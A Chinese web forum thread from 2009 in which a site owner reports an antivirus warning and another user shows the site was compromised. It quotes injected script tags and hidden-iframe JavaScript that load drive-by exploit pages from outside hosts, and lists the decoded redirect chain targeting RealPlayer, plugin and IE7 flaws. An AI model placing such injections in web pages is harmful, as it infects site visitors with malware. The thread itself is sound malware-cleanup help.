1   1  /  1  页   跳转

[原创] 瑞星网页拦截误报

瑞星网页拦截误报

我的网站http://phpbs.cn,打开后居然会拦截,代码又是全部我写的,我只是用了一个普通的AJAX代码,居然一直跳拦截。。。

害得我现在连自己写的网站代码都不能正常打开。。。

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
分享到:
gototop
 

回复:瑞星网页拦截误报

没误报 被挂马了大哥~~
这个js有问题 被挂了很多
<Script Src=http://%63.nuclear3.com/css/c.js></Script>
而且挂了很多这个
http://%63.nuclear3.com/css/c.js内容
document.writeln("<iframe src=http:\/\/pppphhhss.cn\/2\/zhan.htm??001 width=50 height=0><\/iframe>")
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/908507\/ystat.js\"><\/script>");
...
赶紧清除吧~~
最后编辑newcenturymoon 最后编辑于 2009-01-12 23:59:45
gototop
 

回复:瑞星网页拦截误报

大概找的  貌似还不少 ~~               
<td height="26"><span class="STYLE5">·<a href="articleread.php?id=1217" target=_blank class="l12hui">安全员培训报名表<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=1215" target=_blank class="l12hui">互联网上网服务营业场所变更申请登记表<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=1214" target=_blank class="l12hui">泉州市互联网上网服务营业场所申请登记表<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=14" target=_blank class="l12hui">关于进一步加强网吧及网络游戏管理工作的通知<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=5" target=_blank class="l12hui">计算机信息网络国际联网安全保护管理办法<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=4" target=_blank class="l12hui">公众计算机信息网络安全管理规范<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=3" target=_blank class="l12hui">互联网上网服务营业场所管理办法<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
                </tr>
 
                <tr>
                  <td height="26"><span class="STYLE5">·<a href="articleread.php?id=1" target=_blank class="l12hui">娱乐场所管理条例<Script Src=http://%63.nuclear3.com/css/c.js></Script></a></span></td>
最后编辑newcenturymoon 最后编辑于 2009-01-13 00:03:02
gototop
 

回复:瑞星网页拦截误报

http:\/\/pppphhhss.cn\/2\/zhan.htm??001 跳转到
hxx  p://pppphhhss.cn/2/123.htm 解密后
[wide]hxxp://pppphhhss.cn/2/123.htm
    [frame]hxxp://pppphhhss.cn/2/flash.htm
    [frame]hxxp://pppphhhss.cn/2/as.htm
    [frame]hxxp://pppphhhss.cn/2/14.htm
    [frame]hxxp://pppphhhss.cn/2/lz.htm
    [frame]hxxp://pppphhhss.cn/2/sina.htm
    [frame]hxxp://pppphhhss.cn/2/office.htm
    [frame]hxxp://pppphhhss.cn/2/NCTAudioFile.htm
    [frame]hxxp://pppphhhss.cn/2/re10.htm
    [frame]hxxp://pppphhhss.cn/2/re11.htm
有利用 realplayer漏洞的 有利用新浪插件漏洞的 有利用最新的IE7漏洞的 ~~~
最后编辑newcenturymoon 最后编辑于 2009-01-13 00:15:10
gototop
 

回复:瑞星网页拦截误报

我的站遇到同样问题了 请newcenturymoon 帮忙看下

http://www.globalimporter.net/
每天只早上第一次打开网站提示有pppphhhss.cn这个木马 刷新就没了

看网页源代码 看不到任何可疑代码

gototop
 

回复 5F asp2001 的帖子

是不是
http://220.231.180.84:60000/ads_website.php?REFERER=http://www.globalimporter.net/
这个iframe?

var iis_id=2; var isnewip=0;var iis_iframe;var iis_element='iframe';iis_iframe=document.createElement(iis_element);iis_iframe.src='http://wwwwpppaa.cn/1/xue.htm?a009';iis_iframe.width=0;iis_iframe.height=0;if(isnewip>0) document.body.insertBefore(iis_iframe,document.body.firstChild);
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT